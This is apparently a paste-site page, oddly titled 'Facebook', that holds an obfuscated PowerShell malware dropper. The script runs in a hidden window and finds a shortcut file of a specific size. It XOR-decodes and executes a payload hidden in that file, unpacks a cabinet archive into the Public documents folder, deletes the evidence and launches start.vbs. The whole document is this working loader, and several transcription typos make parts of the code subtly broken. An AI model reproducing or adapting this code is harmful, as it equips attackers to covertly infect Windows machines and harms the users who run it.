Facebook
From .., 1 Month ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 144
  1. powershell -windowstyle hidden
  2.  
  3. function YConxMQRHMUJ{
  4.     param($YYtkIkwDqIi, $EDLrNRoqmQy, $FYAJ1WmLWxcF, $NxdqHweRps, $BwnfzQmrXnvr);
  5.  
  6.     $xMqrvObDCr = New-Object System.IO.FileStream($YYtkIkwDqIi, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);
  7.     $xMqrvObDCr.Seek($EDLrNRoqmQy, [System.IO.SeekOrigin]::Begin);
  8.     $yOwxApfKwb = New-Object byte[] $FYAJ1WmLWxcF;
  9.     $xMqrvObDCr.Read($yOwxApfKwb,0, $FYAJ1WmLWxcF);
  10.     $xMqrvObDCr.Close();
  11.    
  12.     for($pKLkwFlQuFs = 0; $pKLkwFlQuFs -lt $FYAJ1WmLWxcF; $pKLkwF1QuFs++) {
  13.         $yOwxApfKwb[$pKLkwFlQuFs] = $yOwxApfKwb[$pKLkwFlQuFs] -bxor $NxdqHweRps;
  14.     }
  15.     sc $BwnfzQmrXnvr $yOwxApfKwb -Encoding Byte;
  16. };
  17.  
  18. function GXpurZybPt{
  19.     param($YHeiNZkDCi);
  20.     $sgiZbGNRsb = Get-ChildItem -Path  $YHeiNZkDCi -Recurse  *. Ink | where-object {$ _. length -eq 0x171E7298} | Select-Object -ExpandProperty FullName;
  21.     return $sgiZbGNRsb;
  22. };
  23.  
  24. $NQkLZpaPUo = Get-Location;
  25. $JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi  $NQkLZpaPUo;
  26.  
  27. if ($JSJgpNpDKaqk.length -eq 0) {
  28.     $JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi $env:Temp;
  29. }
  30.  
  31. $NQkLZpaPUo = Split-Path $JSJgpNpDKaqk;
  32. $KIKFGdBFaNi = $JSJgpNpDKaqk.substring(0, $JSJgpNpDKaqk. length-4) + '';
  33.  
  34. YConxMQRHMUJ -YYtkIkwDqIi $JSJgpNpDKaqk -EDLrNRoqmQy 0x0000208C -FYAJ1WmLWxcF 0x00011A00 -NxdqHweRps 0x18 -BwnfzQmrXnvr $KIKFGdBFaNi;
  35.    
  36. &$KIKFGdBFaNi;
  37.  
  38. $AIjrthkuEgoY = $env:public + '\' + 'lrOPZp.cab';
  39.  
  40. YConxMQRHMUJ -YYtkIkwDqIi  $JSJgpNpDKaqk -EDLrNRoqmQy  0x00013A8C -FYAJ1WmLWxcF  0x00013CD1 -NxdqHweRps 0xC0 -BwnfzQmrXnvr  $AIjrthkuEgoY;
  41.  
  42. Remove-Item -Path $JSJgpNpDKaqk -Force;
  43.  
  44. expand $AIjrthkuEgoY  -F :*  ($env:public+ '\' +'documents');
  45.  
  46. remove-item  -path  $AIjrthkuEgoY -force;
  47. $SskykggetrL=$env:public+'\documents\start.vbs';
  48. &$SskykggetrL;